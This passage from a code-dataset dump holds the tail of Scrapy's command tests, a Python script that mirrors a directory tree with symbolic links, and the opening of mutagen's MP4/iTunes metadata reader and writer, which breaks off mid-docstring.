self.assertEqual(0, self.call('list'))\n\n\nclass RunSpiderCommandTest(CommandTest):\n\n def test_runspider(self):\n tmpdir = self.mktemp()\n os.mkdir(tmpdir)\n fname = abspath(join(tmpdir, 'myspider.py'))\n with open(fname, 'w') as f:\n f.write(\"\"\"\nimport scrapy\n\nclass MySpider(scrapy.Spider):\n name = 'myspider'\n\n def start_requests(self):\n self.logger.debug(\"It Works!\")\n return []\n\"\"\")\n p = self.proc('runspider', fname)\n log = to_native_str(p.stderr.read())\n self.assertIn(\"DEBUG: It Works!\", log)\n self.assertIn(\"INFO: Spider opened\", log)\n self.assertIn(\"INFO: Closing spider (finished)\", log)\n self.assertIn(\"INFO: Spider closed (finished)\", log)\n\n def test_runspider_no_spider_found(self):\n tmpdir = self.mktemp()\n os.mkdir(tmpdir)\n fname = abspath(join(tmpdir, 'myspider.py'))\n with open(fname, 'w') as f:\n f.write(\"\"\"\nfrom scrapy.spiders import Spider\n\"\"\")\n p = self.proc('runspider', fname)\n log = to_native_str(p.stderr.read())\n self.assertIn(\"No spider found in file\", log)\n\n def test_runspider_file_not_found(self):\n p = 
self.proc('runspider', 'some_non_existent_file')\n log = to_native_str(p.stderr.read())\n self.assertIn(\"File not found: some_non_existent_file\", log)\n\n def test_runspider_unable_to_load(self):\n tmpdir = self.mktemp()\n os.mkdir(tmpdir)\n fname = abspath(join(tmpdir, 'myspider.txt'))\n with open(fname, 'w') as f:\n f.write(\"\")\n p = self.proc('runspider', fname)\n log = to_native_str(p.stderr.read())\n self.assertIn(\"Unable to load\", log)\n\n\nclass ParseCommandTest(ProcessTest, SiteTest, CommandTest):\n command = 'parse'\n\n def setUp(self):\n super(ParseCommandTest, self).setUp()\n self.spider_name = 'parse_spider'\n fname = abspath(join(self.proj_mod_path, 'spiders', 'myspider.py'))\n with open(fname, 'w') as f:\n f.write(\"\"\"\nimport scrapy\n\nclass MySpider(scrapy.Spider):\n name = '{0}'\n\n def parse(self, response):\n if getattr(self, 'test_arg', None):\n self.logger.debug('It Works!')\n return [scrapy.Item(), dict(foo='bar')]\n\"\"\".format(self.spider_name))\n\n fname = abspath(join(self.proj_mod_path, 'pipelines.py'))\n with open(fname, 'w') as f:\n f.write(\"\"\"\nimport logging\n\nclass MyPipeline(object):\n component_name = 'my_pipeline'\n\n def process_item(self, item, spider):\n logging.info('It Works!')\n return item\n\"\"\")\n\n fname = abspath(join(self.proj_mod_path, 'settings.py'))\n with open(fname, 'a') as f:\n f.write(\"\"\"\nITEM_PIPELINES = {'%s.pipelines.MyPipeline': 1}\n\"\"\" % self.project_name)\n\n @defer.inlineCallbacks\n def test_spider_arguments(self):\n _, _, stderr = yield self.execute(['--spider', self.spider_name,\n '-a', 'test_arg=1',\n '-c', 'parse',\n self.url('/html')])\n self.assertIn(\"DEBUG: It Works!\", to_native_str(stderr))\n\n @defer.inlineCallbacks\n def test_pipelines(self):\n _, _, stderr = yield self.execute(['--spider', self.spider_name,\n '--pipelines',\n '-c', 'parse',\n self.url('/html')])\n self.assertIn(\"INFO: It Works!\", to_native_str(stderr))\n\n @defer.inlineCallbacks\n def test_parse_items(self):\n status, out, stderr = yield self.execute(\n ['--spider', self.spider_name, '-c', 'parse', self.url('/html')]\n )\n self.assertIn(\"\"\"[{}, {'foo': 'bar'}]\"\"\", to_native_str(out))\n\n\n\nclass BenchCommandTest(CommandTest):\n\n def test_run(self):\n p = self.proc('bench', '-s', 'LOGSTATS_INTERVAL=0.001',\n '-s', 'CLOSESPIDER_TIMEOUT=0.01')\n log = to_native_str(p.stderr.read())\n self.assertIn('INFO: Crawled', log)\n self.assertNotIn('Unhandled Error', log)\n"} {"ext": "py", "sha": "1a3036958a98967887dd32d7ac1c61f266b30daa", "content": "#! 
/usr/bin/env python3\n\n# linktree\n#\n# Make a copy of a directory tree with symbolic links to all files in the\n# original tree.\n# All symbolic links go to a special symbolic link at the top, so you\n# can easily fix things if the original source tree moves.\n# See also \"mkreal\".\n#\n# usage: mklinks oldtree newtree\n\nimport sys, os\n\nLINK = '.LINK'           # Name of special symlink at the top.\n\ndebug = 0\n\ndef main():\n    if not 3 <= len(sys.argv) <= 4:\n        print('usage:', sys.argv[0], 'oldtree newtree [linkto]')\n        return 2\n    oldtree, newtree = sys.argv[1], sys.argv[2]\n    if len(sys.argv) > 3:\n        link = sys.argv[3]\n        link_may_fail = 1\n    else:\n        link = LINK\n        link_may_fail = 0\n    if not os.path.isdir(oldtree):\n        print(oldtree + ': not a directory')\n        return 1\n    try:\n        os.mkdir(newtree, 0o777)\n    except OSError as msg:\n        print(newtree + ': cannot mkdir:', msg)\n        return 1\n    linkname = os.path.join(newtree, link)\n    try:\n        os.symlink(os.path.join(os.pardir, oldtree), linkname)\n    except OSError as msg:\n        if not link_may_fail:\n            print(linkname + ': cannot symlink:', msg)\n            return 1\n        else:\n            print(linkname + ': warning: cannot symlink:', msg)\n    linknames(oldtree, newtree, link)\n    return 0\n\ndef linknames(old, new, link):\n    if debug: print('linknames', (old, new, link))\n    try:\n        names = os.listdir(old)\n    except OSError as msg:\n        print(old + ': warning: cannot listdir:', msg)\n        return\n    for name in names:\n        if name not in (os.curdir, os.pardir):\n            oldname = os.path.join(old, name)\n            linkname = os.path.join(link, name)\n            newname = os.path.join(new, name)\n            if debug > 1: print(oldname, newname, linkname)\n            if os.path.isdir(oldname) and \\\n               not os.path.islink(oldname):\n                try:\n                    os.mkdir(newname, 0o777)\n                    ok = 1\n                except OSError as msg:\n                    # bind the error here so the warning below can report it\n                    print(newname + \\\n                          ': warning: cannot mkdir:', msg)\n                    ok = 0\n                if ok:\n                    linkname = os.path.join(os.pardir,\n                                            linkname)\n                    linknames(oldname, newname, linkname)\n            else:\n                os.symlink(linkname, newname)\n\nif __name__ == '__main__':\n    sys.exit(main())\n"} {"ext": "py", "sha": "1a30372249f51bead4c5c0d4d412fe2f179192bb", "content": "# -*- coding: utf-8 -*-\n\n# Copyright (C) 2006 Joe Wreschnig\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 as\n# published by the Free Software Foundation.\n\n\"\"\"Read and write MPEG-4 audio files with iTunes metadata.\n\nThis module will read MPEG-4 audio information and metadata,\nas found in Apple's MP4 (aka M4A, M4B, M4P) files.\n\nThere is no official specification for this format. 
The source code\nfor TagLib, FAAD, and various MPEG specifications at\n\n* http://developer.apple.com/documentation/QuickTime/QTFF/\n* http://www.geocities.com/xhelmboyx/quicktime/formats/mp4-layout.txt\n* http://standards.iso.org/ittf/PubliclyAvailableStandards/\\\nc041828_ISO_IEC_14496-12_2005(E).zip\n* http://wiki.multimedia.cx/index.php?title=Apple_QuickTime\n\nwere all consulted.\n\"\"\"\n\nimport struct\nimport sys\n\nfrom mutagen import FileType, Metadata, StreamInfo\nfrom mutagen._constants import GENRES\nfrom mutagen._util import (cdata, insert_bytes, DictProxy, MutagenError,\n hashable, enum)\nfrom mutagen._compat import (reraise, PY2, string_types, text_type, chr_,\n iteritems, PY3, cBytesIO)\nfrom ._atom import Atoms, Atom, AtomError\nfrom ._util import parse_full_atom\nfrom ._as_entry import AudioSampleEntry, ASEntryError\n\n\nclass error(IOError, MutagenError):\n pass\n\n\nclass MP4MetadataError(error):\n pass\n\n\nclass MP4StreamInfoError(error):\n pass\n\n\nclass MP4MetadataValueError(ValueError, MP4MetadataError):\n pass\n\n__all__ = ['MP4', 'Open', 'delete', 'MP4Cover', 'MP4FreeForm', 'AtomDataType','MediaKind', 'HDVideo', 'ContentRating']\n\n\n@enum\nclass AtomDataType(object):\n \"\"\"Enum for `dataformat` attribute of MP4FreeForm.\n\n .. versionadded:: 1.25\n \"\"\"\n\n IMPLICIT = 0\n \"\"\"for use with tags for which no type needs to be indicated because\n only one type is allowed\"\"\"\n\n UTF8 = 1\n \"\"\"without any count or null terminator\"\"\"\n\n UTF16 = 2\n \"\"\"also known as UTF-16BE\"\"\"\n\n SJIS = 3\n \"\"\"deprecated unless it is needed for special Japanese characters\"\"\"\n\n HTML = 6\n \"\"\"the HTML file header specifies which HTML version\"\"\"\n\n XML = 7\n \"\"\"the XML header must identify the DTD or schemas\"\"\"\n\n UUID = 8\n \"\"\"also known as GUID; stored as 16 bytes in binary (valid as an ID)\"\"\"\n\n ISRC = 9\n \"\"\"stored as UTF-8 text (valid as an ID)\"\"\"\n\n MI3P = 10\n \"\"\"stored as UTF-8 text (valid as an ID)\"\"\"\n\n GIF = 12\n \"\"\"(deprecated) a GIF image\"\"\"\n\n JPEG = 13\n \"\"\"a JPEG image\"\"\"\n\n PNG = 14\n \"\"\"PNG image\"\"\"\n\n URL = 15\n \"\"\"absolute, in UTF-8 characters\"\"\"\n\n DURATION = 16\n \"\"\"in milliseconds, 32-bit integer\"\"\"\n\n DATETIME = 17\n \"\"\"in UTC, counting seconds since midnight, January 1, 1904;\n 32 or 64-bits\"\"\"\n\n GENRES = 18\n \"\"\"a list of enumerated values\"\"\"\n\n INTEGER = 21\n \"\"\"a signed big-endian integer with length one of { 1,2,3,4,8 } bytes\"\"\"\n\n RIAA_PA = 24\n \"\"\"RIAA parental advisory; { -1=no, 1=yes, 0=unspecified },\n 8-bit ingteger\"\"\"\n\n UPC = 25\n \"\"\"Universal Product Code, in text UTF-8 format (valid as an ID)\"\"\"\n\n BMP = 27\n \"\"\"Windows bitmap image\"\"\"\n\n\n@hashable\nclass MP4Cover(bytes):\n \"\"\"A cover artwork.\n\n Attributes:\n\n * imageformat -- format of the image (either FORMAT_JPEG or FORMAT_PNG)\n \"\"\"\n\n FORMAT_JPEG = AtomDataType.JPEG\n FORMAT_PNG = AtomDataType.PNG\n\n def __new__(cls, data, *args, **kwargs):\n return bytes.__new__(cls, data)\n\n def __init__(self, data, imageformat=FORMAT_JPEG):\n self.imageformat = imageformat\n\n __hash__ = bytes.__hash__\n\n def __eq__(self, other):\n if not isinstance(other, MP4Cover):\n return NotImplemented\n\n if not bytes.__eq__(self, other):\n return False\n\n if self.imageformat != other.imageformat:\n return False\n\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __repr__(self):\n return \"%s(%r, %r)\" % (\n type(self).__name__, 
bytes(self),\n AtomDataType(self.imageformat))\n\n\n@hashable\nclass MP4FreeForm(bytes):\n \"\"\"A freeform value.\n\n Attributes:\n\n * dataformat -- format of the data (see AtomDataType)\n \"\"\"\n\n FORMAT_DATA = AtomDataType.IMPLICIT # deprecated\n FORMAT_TEXT = AtomDataType.UTF8 # deprecated\n\n def __new__(cls, data, *args, **kwargs):\n return bytes.__new__(cls, data)\n\n def __init__(self, data, dataformat=AtomDataType.UTF8, version=0):\n self.dataformat = dataformat\n self.version = version\n\n __hash__ = bytes.__hash__\n\n def __eq__(self, other):\n if not isinstance(other, MP4FreeForm):\n return NotImplemented\n\n if not bytes.__eq__(self, other):\n return False\n\n if self.dataformat != other.dataformat:\n return False\n\n if self.version != other.version:\n return False\n\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __repr__(self):\n return \"%s(%r, %r)\" % (\n type(self).__name__, bytes(self),\n AtomDataType(self.dataformat))\n\n\n\ndef _name2key(name):\n if PY2:\n return name\n return name.decode(\"latin-1\")\n\n\ndef _key2name(key):\n if PY2:\n return key\n return key.encode(\"latin-1\")\n\n\nclass MP4Tags(DictProxy, Metadata):\n r\"\"\"Dictionary containing Apple iTunes metadata list key/values.\n\n Keys are four byte identifiers, except for freeform ('----')\n keys. Values are usually unicode strings, but some atoms have a\n special structure:\n\n Text values (multiple values per key are supported):\n\n * '\\\\xa9nam' -- track title\n * '\\\\xa9alb' -- album\n * '\\\\xa9ART' -- artist\n * 'aART' -- album artist\n * '\\\\xa9wrt' -- composer\n * '\\\\xa9day' -- year\n * '\\\\xa9cmt' -- comment\n * 'desc' -- description (usually used in podcasts)\n * 'purd' -- purchase date\n * '\\\\xa9grp' -- grouping\n * '\\\\xa9gen' -- genre\n * '\\\\xa9lyr' -- lyrics\n * 'purl' -- podcast URL\n * 'egid' -- podcast episode GUID\n * 'catg' -- podcast category\n * 'keyw' -- podcast keywords\n * '\\\\xa9too' -- encoded by\n * 'cprt' -- copyright\n * 'soal' -- album sort order\n * 'soaa' -- album artist sort order\n * 'soar' -- artist sort order\n * 'sonm' -- title sort order\n * 'soco' -- composer sort order\n * 'sosn' -- show sort order\n * 'tvsh' -- show name\n\n Boolean values:\n\n * 'cpil' -- part of a compilation\n * 'pgap' -- part of a gapless album\n * 'pcst' -- podcast (iTunes reads this only on import)\n\n Tuples of ints (multiple values per key are supported):\n\n * 'trkn' -- track number, total tracks\n * 'disk' -- disc number, total discs\n\n Others:\n\n * 'tmpo' -- tempo/BPM, 16 bit int\n * 'covr' -- cover artwork, list of MP4Cover objects (which are\n tagged strs)\n * 'gnre' -- ID3v1 genre. Not supported, use '\\\\xa9gen' instead.\n\n The freeform '----' frames use a key in the format '----:mean:name'\n where 'mean' is usually 'com.apple.iTunes' and 'name' is a unique\n identifier for this frame. The value is a str, but is probably\n text that can be decoded as UTF-8. 
Multiple values per key are\n supported.\n\n MP4 tag data cannot exist outside of the structure of an MP4 file,\n so this class should not be manually instantiated.\n\n Unknown non-text tags and tags that failed to parse will be written\n back as is.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n self._failed_atoms = {}\n super(MP4Tags, self).__init__(*args, **kwargs)\n\n def load(self, atoms, fileobj):\n try:\n ilst = atoms[b\"moov.udta.meta.ilst\"]\n except KeyError as key:\n raise MP4MetadataError(key)\n for atom in ilst.children:\n ok, data = atom.read(fileobj)\n if not ok:\n raise MP4MetadataError(\"Not enough data\")\n\n try:\n if atom.name in self.__atoms:\n info = self.__atoms[atom.name]\n info[0](self, atom, data)\n else:\n # unknown atom, try as text\n self.__parse_text(atom, data, implicit=False)\n except MP4MetadataError:\n # parsing failed, save them so we can write them back\n key = _name2key(atom.name)\n self._failed_atoms.setdefault(key, []).append(data)\n\n def __setitem__(self, key, value):\n if not isinstance(key, str):\n raise TypeError(\"key has to be str\")\n super(MP4Tags, self).__setitem__(key, value)\n\n @classmethod\n def _can_load(cls, atoms):\n return b\"moov.udta.meta.ilst\" in atoms\n\n @staticmethod\n def _key_sort(item):\n (key, v) = item\n # iTunes always writes the tags in order of \"relevance\", try\n # to copy it as closely as possible.\n order = [\"\\xa9nam\", \"\\xa9ART\", \"\\xa9wrt\", \"\\xa9alb\",\n \"\\xa9gen\", \"gnre\", \"trkn\", \"disk\",\n \"\\xa9day\", \"cpil\", \"pgap\", \"pcst\", \"tmpo\",\n \"\\xa9too\", \"----\", \"covr\", \"\\xa9lyr\", \"stik\",\n \"tvsh\", \"tven\", \"tvsn\", \"tves\", \"tvnn\"]\n order = dict(zip(order, range(len(order))))\n last = len(order)\n # If there's no key-based way to distinguish, order by length.\n # If there's still no way, go by string comparison on the\n # values, so we at least have something determinstic.\n return (order.get(key[:4], last), len(repr(v)), repr(v))\n\n def save(self, filename):\n \"\"\"Save the metadata to the given filename.\"\"\"\n\n values = []\n items = sorted(self.items(), key=self._key_sort)\n for key, value in items:\n atom_name = _key2name(key)[:4]\n if atom_name in self.__atoms:\n render_func = self.__atoms[atom_name][1]\n else:\n render_func = type(self).__render_text\n\n try:\n if value:\n values.append(render_func(self, key, value))\n except (TypeError, ValueError) as s:\n reraise(MP4MetadataValueError, s, sys.exc_info()[2])\n\n for key, failed in iteritems(self._failed_atoms):\n # don't write atoms back if we have added a new one with\n # the same name, this excludes freeform which can have\n # multiple atoms with the same key (most parsers seem to be able\n # to handle that)\n if key in self:\n assert _key2name(key) != b\"----\"\n continue\n for data in failed:\n values.append(Atom.render(_key2name(key), data))\n\n data = Atom.render(b\"ilst\", b\"\".join(values))\n\n # Find the old atoms.\n with open(filename, \"rb+\") as fileobj:\n try:\n atoms = Atoms(fileobj)\n except AtomError as err:\n reraise(error, err, sys.exc_info()[2])\n\n try:\n path = atoms.path(b\"moov\", b\"udta\", b\"meta\", b\"ilst\")\n except KeyError:\n self.__save_new(fileobj, atoms, data)\n else:\n self.__save_existing(fileobj, atoms, path, data)\n\n def __pad_ilst(self, data, length=None):\n if length is None:\n length = ((len(data) + 1023) & ~1023) - len(data)\n return Atom.render(b\"free\", b\"\\x00\" * length)\n\n def __save_new(self, fileobj, atoms, ilst):\n hdlr = Atom.render(b\"hdlr\", 
b\"\\x00\" * 8 + b\"mdirappl\" + b\"\\x00\" * 9)\n meta = Atom.render(\n b\"meta\", b\"\\x00\\x00\\x00\\x00\" + hdlr + ilst + self.__pad_ilst(ilst))\n try:\n path = atoms.path(b\"moov\", b\"udta\")\n except KeyError:\n # moov.udta not found -- create one\n path = atoms.path(b\"moov\")\n meta = Atom.render(b\"udta\", meta)\n offset = path[-1].offset + 8\n insert_bytes(fileobj, len(meta), offset)\n fileobj.seek(offset)\n fileobj.write(meta)\n self.__update_parents(fileobj, path, len(meta))\n self.__update_offsets(fileobj, atoms, len(meta), offset)\n\n def __save_existing(self, fileobj, atoms, path, data):\n # Replace the old ilst atom.\n ilst = path.pop()\n offset = ilst.offset\n length = ilst.length\n\n # Check for padding \"free\" atoms\n meta = path[-1]\n index = meta.children.index(ilst)\n try:\n prev = meta.children[index - 1]\n if prev.name == b\"free\":\n offset = prev.offset\n length += prev.length\n except IndexError:\n pass\n try:\n next = meta.children[index + 1]\n if next.name == b\"free\":\n length += next.length\n except IndexError:\n pass\n\n delta = len(data) - length\n if delta > 0 or (delta < 0 and delta > -8):\n data += self.__pad_ilst(data)\n delta = len(data) - length\n insert_bytes(fileobj, delta, offset)\n elif delta < 0:\n data += self.__pad_ilst(data, -delta - 8)\n delta = 0\n\n fileobj.seek(offset)\n fileobj.write(data)\n self.__update_parents(fileobj, path, delta)\n self.__update_offsets(fileobj, atoms, delta, offset)\n\n def __update_parents(self, fileobj, path, delta):\n \"\"\"Update all parent atoms with the new size.\"\"\"\n for atom in path:\n fileobj.seek(atom.offset)\n size = cdata.uint_be(fileobj.read(4))\n if size == 1: # 64bit\n # skip name (4B) and read size (8B)\n size = cdata.ulonglong_be(fileobj.read(12)[4:])\n fileobj.seek(atom.offset + 8)\n fileobj.write(cdata.to_ulonglong_be(size + delta))\n else: # 32bit\n fileobj.seek(atom.offset)\n fileobj.write(cdata.to_uint_be(size + delta))\n\n def __update_offset_table(self, fileobj, fmt, atom, delta, offset):\n \"\"\"Update offset table in the specified atom.\"\"\"\n if atom.offset > offset:\n atom.offset += delta\n fileobj.seek(atom.offset + 12)\n data = fileobj.read(atom.length - 12)\n fmt = fmt % cdata.uint_be(data[:4])\n offsets = struct.unpack(fmt, data[4:])\n offsets = [o + (0, delta)[offset < o] for o in offsets]\n fileobj.seek(atom.offset + 16)\n fileobj.write(struct.pack(fmt, *offsets))\n\n def __update_tfhd(self, fileobj, atom, delta, offset):\n if atom.offset > offset:\n atom.offset += delta\n fileobj.seek(atom.offset + 9)\n data = fileobj.read(atom.length - 9)\n flags = cdata.uint_be(b\"\\x00\" + data[:3])\n if flags & 1:\n o = cdata.ulonglong_be(data[7:15])\n if o > offset:\n o += delta\n fileobj.seek(atom.offset + 16)\n fileobj.write(cdata.to_ulonglong_be(o))\n\n def __update_offsets(self, fileobj, atoms, delta, offset):\n \"\"\"Update offset tables in all 'stco' and 'co64' atoms.\"\"\"\n if delta == 0:\n return\n moov = atoms[b\"moov\"]\n for atom in moov.findall(b'stco', True):\n self.__update_offset_table(fileobj, \">%dI\", atom, delta, offset)\n for atom in moov.findall(b'co64', True):\n self.__update_offset_table(fileobj, \">%dQ\", atom, delta, offset)\n try:\n for atom in atoms[b\"moof\"].findall(b'tfhd', True):\n self.__update_tfhd(fileobj, atom, delta, offset)\n except KeyError:\n pass\n\n def __parse_data(self, atom, data):\n pos = 0\n while pos < atom.length - 8:\n head = data[pos:pos + 12]\n if len(head) != 12:\n raise MP4MetadataError(\"truncated atom % r\" % atom.name)\n length, 
name = struct.unpack(\">I4s\", head[:8])\n version = ord(head[8:9])\n flags = struct.unpack(\">I\", b\"\\x00\" + head[9:12])[0]\n if name != b\"data\":\n raise MP4MetadataError(\n \"unexpected atom %r inside %r\" % (name, atom.name))\n\n chunk = data[pos + 16:pos + length]\n if len(chunk) != length - 16:\n raise MP4MetadataError(\"truncated atom % r\" % atom.name)\n yield version, flags, chunk\n pos += length\n\n def __add(self, key, value, single=False):\n assert isinstance(key, str)\n\n if single:\n self[key] = value\n else:\n self.setdefault(key, []).extend(value)\n\n def __render_data(self, key, version, flags, value):\n return Atom.render(_key2name(key), b\"\".join([\n Atom.render(\n b\"data\", struct.pack(\">2I\", version << 24 | flags, 0) + data)\n for data in value]))\n\n def __parse_freeform(self, atom, data):\n length = cdata.uint_be(data[:4])\n mean = data[12:length]\n pos = length\n length = cdata.uint_be(data[pos:pos + 4])\n name = data[pos + 12:pos + length]\n pos += length\n value = []\n while pos < atom.length - 8:\n length, atom_name = struct.unpack(\">I4s\", data[pos:pos + 8])\n if atom_name != b\"data\":\n raise MP4MetadataError(\n \"unexpected atom %r inside %r\" % (atom_name, atom.name))\n\n version = ord(data[pos + 8:pos + 8 + 1])\n flags = struct.unpack(\">I\", b\"\\x00\" + data[pos + 9:pos + 12])[0]\n value.append(MP4FreeForm(data[pos + 16:pos + length],\n dataformat=flags, version=version))\n pos += length\n\n key = _name2key(atom.name + b\":\" + mean + b\":\" + name)\n self.__add(key, value)\n\n def __render_freeform(self, key, value):\n if isinstance(value, bytes):\n value = [value]\n\n dummy, mean, name = _key2name(key).split(b\":\", 2)\n mean = struct.pack(\">I4sI\", len(mean) + 12, b\"mean\", 0) + mean\n name = struct.pack(\">I4sI\", len(name) + 12, b\"name\", 0) + name\n\n data = b\"\"\n for v in value:\n flags = AtomDataType.UTF8\n version = 0\n if isinstance(v, MP4FreeForm):\n flags = v.dataformat\n version = v.version\n\n data += struct.pack(\n \">I4s2I\", len(v) + 16, b\"data\", version << 24 | flags, 0)\n data += v.encode('UTF-8')\n\n return Atom.render(b\"----\", mean + name + data)\n\n def __parse_pair(self, atom, data):\n key = _name2key(atom.name)\n values = [struct.unpack(\">2H\", d[2:6]) for\n version, flags, d in self.__parse_data(atom, data)]\n self.__add(key, values)\n\n def __render_pair(self, key, value):\n data = []\n for (track, total) in value:\n if 0 <= track < 1 << 16 and 0 <= total < 1 << 16:\n data.append(struct.pack(\">4H\", 0, track, total, 0))\n else:\n raise MP4MetadataValueError(\n \"invalid numeric pair %r\" % ((track, total),))\n return self.__render_data(key, 0, AtomDataType.IMPLICIT, data)\n\n def __render_pair_no_trailing(self, key, value):\n data = []\n for (track, total) in value:\n if 0 <= track < 1 << 16 and 0 <= total < 1 << 16:\n data.append(struct.pack(\">3H\", 0, track, total))\n else:\n raise MP4MetadataValueError(\n \"invalid numeric pair %r\" % ((track, total),))\n return self.__render_data(key, 0, AtomDataType.IMPLICIT, data)\n\n def __parse_genre(self, atom, data):\n values = []\n for version, flags, data in self.__parse_data(atom, data):\n # version = 0, flags = 0\n if len(data) != 2:\n raise MP4MetadataValueError(\"invalid genre\")\n genre = cdata.short_be(data)\n # Translate to a freeform genre.\n try:\n genre = GENRES[genre - 1]\n except IndexError:\n # this will make us write it back at least\n raise MP4MetadataValueError(\"unknown genre\")\n values.append(genre)\n key = _name2key(b\"\\xa9gen\")\n 
self.__add(key, values)\n\n def __parse_tempo(self, atom, data):\n values = []\n for version, flags, data in self.__parse_data(atom, data):\n # version = 0, flags = 0 or 21\n if len(data) != 2:\n raise MP4MetadataValueError(\"invalid tempo\")\n values.append(cdata.ushort_be(data))\n key = _name2key(atom.name)\n self.__add(key, values)\n\n def __render_tempo(self, key, value):\n try:\n if len(value) == 0:\n return self.__render_data(key, 0, AtomDataType.INTEGER, b\"\")\n\n if (min(value) < 0) or (max(value) >= 2 ** 16):\n raise MP4MetadataValueError(\n \"invalid 16 bit integers: %r\" % value)\n except TypeError:\n raise MP4MetadataValueError(\n \"tmpo must be a list of 16 bit integers\")\n\n values = [cdata.to_ushort_be(v) for v in value]\n return self.__render_data(key, 0, AtomDataType.INTEGER, values)\n\n def __parse_bool(self, atom, data):\n for version, flags, data in self.__parse_data(atom, data):\n if len(data) != 1:\n raise MP4MetadataValueError(\"invalid bool\")\n\n value = bool(ord(data))\n key = _name2key(atom.name)\n self.__add(key, value, single=True)\n\n def __render_bool(self, key, value):\n return self.__render_data(\n key, 0, AtomDataType.INTEGER, [chr_(bool(value))])\n\n def __parse_cover(self, atom, data):\n values = []\n pos = 0\n while pos < atom.length - 8:\n length, name, imageformat = struct.unpack(\">I4sI\",\n data[pos:pos + 12])\n if name != b\"data\":\n if name == b\"name\":\n pos += length\n continue\n raise MP4MetadataError(\n \"unexpected atom %r inside 'covr'\" % name)\n if imageformat not in (MP4Cover.FORMAT_JPEG, MP4Cover.FORMAT_PNG):\n # Sometimes AtomDataType.IMPLICIT or simply wrong.\n # In all cases it was jpeg, so default to it\n imageformat = MP4Cover.FORMAT_JPEG\n cover = MP4Cover(data[pos + 16:pos + length], imageformat)\n values.append(cover)\n pos += length\n\n key = _name2key(atom.name)\n self.__add(key, values)\n\n def __render_cover(self, key, value):\n atom_data = []\n for cover in value:\n try:\n imageformat = cover.imageformat\n except AttributeError:\n imageformat = MP4Cover.FORMAT_JPEG\n atom_data.append(Atom.render(\n b\"data\", struct.pack(\">2I\", imageformat, 0) + cover))\n return Atom.render(_key2name(key), b\"\".join(atom_data))\n\n def __parse_text(self, atom, data, implicit=True):\n # implicit = False, for parsing unknown atoms only take utf8 ones.\n # For known ones we can assume the implicit are utf8 too.\n values = []\n for version, flags, atom_data in self.__parse_data(atom, data):\n if implicit:\n if flags not in (AtomDataType.IMPLICIT, AtomDataType.UTF8):\n raise MP4MetadataError(\n \"Unknown atom type %r for %r\" % (flags, atom.name))\n else:\n if flags != AtomDataType.UTF8:\n raise MP4MetadataError(\n \"%r is not text, ignore\" % atom.name)\n\n try:\n text = atom_data.decode(\"utf-8\")\n except UnicodeDecodeError as e:\n raise MP4MetadataError(\"%s: %s\" % (_name2key(atom.name), e))\n\n values.append(text)\n\n key = _name2key(atom.name)\n self.__add(key, values)\n\n def __render_text(self, key, value, flags=AtomDataType.UTF8):\n if isinstance(value, string_types):\n value = [value]\n encoded = []\n for v in value:\n if not isinstance(v, text_type):\n if PY3:\n raise TypeError(\"%r not str\" % v)\n v = v.decode(\"utf-8\")\n encoded.append(v.encode(\"utf-8\"))\n\n return self.__render_data(key, 0, flags, encoded)\n\n def __render_8int(self, key, value):\n try:\n if len(value) == 0:\n return self.__render_data(key, 0x07, b\"\")\n\n if min(value) < 0 or max(value) >= 2 ** 8:\n raise MP4MetadataValueError(\n \"invalid 8 bit 
integers: %r\" % value)\n except TypeError:\n raise MP4MetadataValueError(\n \"%s must be a list of 8 bit integers\" % (key))\n\n values = list(map(cdata.to_uchar_be, value))\n return self.__render_data(key, 0, 0x07, values)\n\n def __render_32int(self, key, value):\n try:\n if len(value) == 0:\n return self.__render_data(key, 0x31, b\"\")\n\n if min(value) < 0 or max(value) >= 2 ** 32:\n raise MP4MetadataValueError(\n \"invalid 32 bit integers: %r\" % value)\n except TypeError:\n raise MP4MetadataValueError(\n \"%s must be a list of 32 bit integers\" % (key))\n\n values = list(map(cdata.to_uint_be, value))\n return self.__render_data(key, 0, 0x31, values)\n\n def delete(self, filename):\n \"\"\"Remove the metadata from the given filename.\"\"\"\n\n self._failed_atoms.clear()\n self.clear()\n self.save(filename)\n\n __atoms = {\n b\"----\": (__parse_freeform, __render_freeform),\n b\"trkn\": (__parse_pair, __render_pair),\n b\"disk\": (__parse_pair, __render_pair_no_trailing),\n b\"gnre\": (__parse_genre, None),\n b\"tmpo\": (__parse_tempo, __render_tempo),\n b\"cpil\": (__parse_bool, __render_bool),\n b\"pgap\": (__parse_bool, __render_bool),\n b\"pcst\": (__parse_bool, __render_bool),\n b\"covr\": (__parse_cover, __render_cover),\n b\"purl\": (__parse_text, __render_text),\n b\"egid\": (__parse_text, __render_text),\n b\"hdvd\": (__parse_text, __render_8int),\n b\"tves\": (__parse_text, __render_32int),\n b\"tvsn\": (__parse_text, __render_32int),\n b\"stik\": (__parse_text, __render_8int),\n b\"rtng\": (__parse_text, __render_8int),\n }\n\n # these allow implicit flags and parse as text\n for name in [b\"\\xa9nam\", b\"\\xa9alb\", b\"\\xa9ART\", b\"aART\", b\"\\xa9wrt\",\n b\"\\xa9day\", b\"\\xa9cmt\", b\"desc\", b\"purd\", b\"\\xa9grp\",\n b\"\\xa9gen\", b\"\\xa9lyr\", b\"catg\", b\"keyw\", b\"\\xa9too\",\n b\"cprt\", b\"soal\", b\"soaa\", b\"soar\", b\"sonm\", b\"soco\",\n b\"sosn\", b\"tvsh\", b\"tven\", b\"tvnn\"]:\n __atoms[name] = (__parse_text, __render_text)\n\n def pprint(self):\n values = []\n for key, value in iteritems(self):\n if not isinstance(key, text_type):\n key = key.decode(\"latin-1\")\n if key == \"covr\":\n values.append(\"%s=%s\" % (key, \", \".join(\n [\"[%d bytes of data]\" % len(data) for data in value])))\n elif isinstance(value, list):\n for v in value:\n values.append(\"%s=%r\" % (key, v))\n else:\n values.append(\"%s=%r\" % (key, value))\n return \"\\n\".join(values)\n\n\nclass MP4Info(StreamInfo):\n \"\"\"MPEG-4 stream information.\n\n Attributes:\n\n * bitrate -- bitrate in bits per second, as an int\n * length -- file length in seconds, as a float\n * channels -- number of audio channels\n * sample_rate -- audio sampling rate in Hz\n * bits_per_sample -- bits per sample\n * codec (string):\n * if starting with ``\"mp4a\"`` uses an mp4a audio codec\n (see the codec parameter in rfc6381 for details e.g. ``\"mp4a.40.2\"``)\n * for everything else see a list of possible values at\n http://www.mp4ra.org/codecs.html\n\n e.g. ``\"mp4a\"``, ``\"alac\"``, 